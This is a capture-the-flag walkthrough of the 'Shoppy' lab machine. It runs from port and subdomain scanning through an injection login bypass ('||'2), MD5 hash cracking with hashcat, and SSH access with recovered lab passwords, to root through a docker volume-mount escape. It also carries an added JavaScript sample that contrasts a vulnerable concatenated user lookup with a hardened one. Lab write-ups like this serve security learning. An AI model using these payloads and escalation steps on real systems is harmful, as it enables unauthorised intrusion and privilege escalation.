CTF Shoppy

  1. Rustscan
  2. /etc/hosts
  3. Port 80
    1. Subdomain listing
    2. Gobuster
    3. Login page
    4. Bypass auth login page
    5. Search for user
    6. Crack the password
  4. Mattermost
  5. jaeger
  6. deploy

Rustscan

rustscan -a 10.10.11.180

Output:

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
9093/tcp open  copycat syn-ack

/etc/hosts

echo "10.10.11.180 shoppy.htb" >> /etc/hosts

Port 80

Subdomain listing

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200 

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard

Output:

/images               (Status: 301) [Size: 179] [--> /images/]
/login                (Status: 200) [Size: 1074]              
/admin                (Status: 302) [Size: 28] [--> /login]   
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/Login                (Status: 200) [Size: 1074]              
/js                   (Status: 301) [Size: 171] [--> /js/]    
/fonts                (Status: 301) [Size: 177] [--> /fonts/] 
/Admin                (Status: 302) [Size: 28] [--> /login]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/LogIn                (Status: 200) [Size: 1074]               
/LOGIN                (Status: 200) [Size: 1074]         

Login page

http://shoppy.htb/login

You can bypass the login page.
I will use Burp Suite to intercept the traffic.

While I was playing with Burp Suite I got an interesting error:

We have a username, jaeger:
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ' in the field, the page takes more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
From this list I took '||'2 and added admin at the beginning.

Search for user

I have to search for a user; it's not working with jaeger.

I enter '||'2 to find a new user, josh.
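Why the '||'2 payload from the two steps above matches a user it was never meant to, shown as an added example that is not code from the writeup or from the ShoppyApp: it assumes the lookup concatenates the submitted username into a JavaScript expression evaluated per record, which the writeup does not confirm, and puts the hardened lookup beside it.

```javascript
// Added example, not the ShoppyApp's code. Assumption: the login looks up the
// user by splicing the submitted name into a JavaScript expression that is
// evaluated against each stored record (a $where-style filter).

// Constructed sample records standing in for the real user store.
const users = [
  { username: "admin", hash: "constructed-hash-1" },
  { username: "josh", hash: "constructed-hash-2" },
];

// Vulnerable lookup: the filter is built as source code, so the input can end
// the quoted string and append its own logic. For admin'||'2 the expression
// becomes  this.username == 'admin'||'2'  which is truthy for every record.
function findUsersUnsafe(username) {
  const expr = "this.username == '" + username + "'";
  const matcher = new Function("return (" + expr + ");");
  return users.filter((doc) => matcher.call(doc));
}

// Hardened lookup: the username is data, never code. Non-string input is
// rejected outright and the comparison is a strict equality on the value.
function findUsersSafe(username) {
  if (typeof username !== "string") return [];
  return users.filter((doc) => doc.username === username);
}
```

With the vulnerable lookup the payload returns both constructed users (which is how the second, unexpected user surfaces); with the hardened one it returns none.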

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier

echo "6ebcea65320589ca4f2f1ce039975995" > hash      
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a Linux user; I saw him in the error with Burp Suite.
Let's use SSH.

jaeger

ssh jaeger@shoppy.htb

sudo -l

sudo -u deploy /home/deploy/password-manager

I don't have the password; if I use strings I see nothing, but with cat it's working.

Sample

deploy

ssh deploy@shoppy.htb

Deploying@pp!
I'm using lse again.

I can use docker, and I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I'm root.